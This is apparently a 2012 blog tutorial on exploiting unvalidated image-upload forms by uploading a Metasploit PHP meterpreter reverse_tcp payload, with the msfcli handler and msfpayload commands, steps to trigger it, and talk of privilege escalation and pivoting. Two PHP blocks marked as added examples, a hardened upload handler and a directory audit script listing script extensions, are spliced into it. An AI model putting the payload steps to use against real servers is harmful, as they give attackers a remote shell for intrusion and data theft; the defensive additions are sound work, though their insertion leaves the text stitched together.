Tuesday, April 3, 2012

Deploying payload via PHP

Another fun way to deploy our meterpreter payload is with PHP.

Many webservers allow file uploads for things like image files to be displayed on the page. If the upload form neglects to verify the file type, this can allow us to upload a PHP file containing our payload and then trick the server into executing it. Alternatively, the payload could be injected into a forum post or some such thing.
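The upload form described above is the vulnerable case. As an added example (not code from the original post), here is what a hardened PHP image-upload handler looks like: it ignores the client-supplied filename and MIME type, sniffs the actual content, picks its own filename and extension, and stores the file outside the document root so nothing in that directory can ever be handed to the PHP interpreter. The storage path, the form field name and the size limit are assumptions.

```php
<?php
// Added example (not from the original post): a hardened image-upload handler.
// UPLOAD_DIR, the "image" form field and MAX_BYTES are assumptions.

declare(strict_types=1);

// Store uploads OUTSIDE the document root so the web server never executes
// anything in this directory, whatever its name or contents. (Assumed path.)
const UPLOAD_DIR = '/var/www/uploads_private';

// Allowed image types: MIME type as reported by libmagic => canonical extension.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

const MAX_BYTES = 2 * 1024 * 1024; // 2 MiB

/**
 * Validate one entry of $_FILES and move it into UPLOAD_DIR under a
 * server-generated name. Returns the stored filename, or throws.
 */
function store_image_upload(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or missing');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Only accept files that PHP itself received through the HTTP upload.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // Ignore the client-supplied name and $file['type'] entirely; sniff the content.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException("disallowed content type: $mime");
    }

    // Require the file to actually parse as an image; a script with a faked
    // header fails here.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }

    // Server-chosen name: random, with the extension derived from the sniffed type,
    // so "m.php" or "shot.php.jpg" can never survive as a filename.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = UPLOAD_DIR . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640); // never executable, not world-readable
    return $name;
}

// Usage (assumes a form field named "image"):
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['image'])) {
    try {
        $stored = store_image_upload($_FILES['image']);
        echo 'stored as ' . htmlspecialchars($stored);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . htmlspecialchars($e->getMessage());
    }
}
```

The decisive control is the last part, not the type checks: a valid JPEG can still carry PHP code in a comment or EXIF segment, so the content sniffing is defence in depth, while the server-chosen `.jpg` name and the non-web-accessible storage directory are what guarantee the file is never run. Images are then served by a small read-only script that sends the bytes with the right Content-Type. If uploads must live under the document root, additionally turn script execution off for that directory (for Apache with mod_php, `php_admin_flag engine off` inside the directory's `<Directory>` block).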

First thing we do, is start up a meterpreter handler using the PHP method, like this:
/opt/metasploit-4.2.0/app/msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost="LISTENER IP" lport="PORT" ExitOnSession=false J


Now we create our meterpreter PHP payload file. This command will create the PHP payload and save it as m.php:
/opt/metasploit-4.2.0/app/msfpayload php/meterpreter/reverse_tcp LHOST="LISTENER IP" LPORT="PORT" R > ~/m.php



Now we simply upload our PHP script like we would an image file.



Then we navigate a browser to the location where the server usually hosts images, and click on the file we just uploaded.


The server runs our m.php, causing the server to connect back to our meterpreter handler on the specified port and give us a shell on the target server. In this case, the process is running as the apache user.
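From the defender's side, the tell-tale artifact of the step above is a file in the image directory that is not an image. As an added example (not code from the original post), the following PHP command-line script audits an upload directory for exactly that: names that end in (or contain) an extension the web server would hand to the interpreter, content whose sniffed type is not an image, and otherwise valid images that carry a PHP open tag. The directory path and the extension list are assumptions; the extension list should be matched to the server's own handler configuration.

```php
<?php
// Added example (not from the original post): audit an image directory for
// files that should not be there. Directory path and extension list are assumptions.

declare(strict_types=1);

// Extensions commonly mapped to the PHP interpreter (adjust to your server config).
const SCRIPT_EXTENSIONS = ['php', 'phtml', 'php3', 'php4', 'php5', 'php7', 'phar', 'phps'];

const IMAGE_MIME = ['image/jpeg', 'image/png', 'image/gif'];

/**
 * Return a list of [path, reason] pairs, one for every suspicious file under $dir.
 */
function audit_image_dir(string $dir): array
{
    $findings = [];
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );

    foreach ($it as $f) {
        /** @var SplFileInfo $f */
        if (!$f->isFile()) {
            continue;
        }
        $path = $f->getPathname();

        // 1. Any script extension in the name, whether final ("m.php") or
        //    buried ("x.php.jpg"), is never legitimate in an image directory.
        $parts = explode('.', strtolower($f->getFilename()));
        array_shift($parts); // drop the base name, keep only extensions
        foreach ($parts as $ext) {
            if (in_array($ext, SCRIPT_EXTENSIONS, true)) {
                $findings[] = [$path, "script extension .$ext in filename"];
                continue 2;
            }
        }

        // 2. The content itself must sniff as an image.
        $mime = $finfo->file($path);
        if (!in_array($mime, IMAGE_MIME, true)) {
            $findings[] = [$path, "content type $mime is not an image"];
            continue;
        }

        // 3. A real image carrying a PHP open tag (e.g. in EXIF or a comment
        //    chunk) is worth a look: harmless unless something includes it as code.
        $head = file_get_contents($path, false, null, 0, 1 << 20);
        if ($head !== false && strpos($head, '<?php') !== false) {
            $findings[] = [$path, 'image contains a PHP open tag'];
        }
    }
    return $findings;
}

// Usage: php audit_uploads.php /var/www/html/images   (path is an assumption)
$dir = $argv[1] ?? '/var/www/html/images';
foreach (audit_image_dir($dir) as [$path, $why]) {
    fwrite(STDOUT, "$path: $why\n");
}
```

Run it from cron or a file-integrity job and alert on any output; the same three checks make a sensible gate for a web-application firewall or reverse proxy in front of the upload endpoint. The other signal the step above leaves is network-level: a web server process opening an outbound TCP connection to an arbitrary port is exactly what egress filtering and outbound-connection logging exist to catch.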




We can now attempt to escalate privileges to gain root/SYSTEM, or we can just look around to see what we've actually gained access to. Chances are that there are database or other files on this system that apache can read, or perhaps we'll just want to pivot through this target to attack something more sensitive behind the firewall that's not directly accessible from the outside world.

Comments:

  1. Hi, how can I upload my PHP file, please?

  2. Pretty interesting post! Thanks, it was interesting.
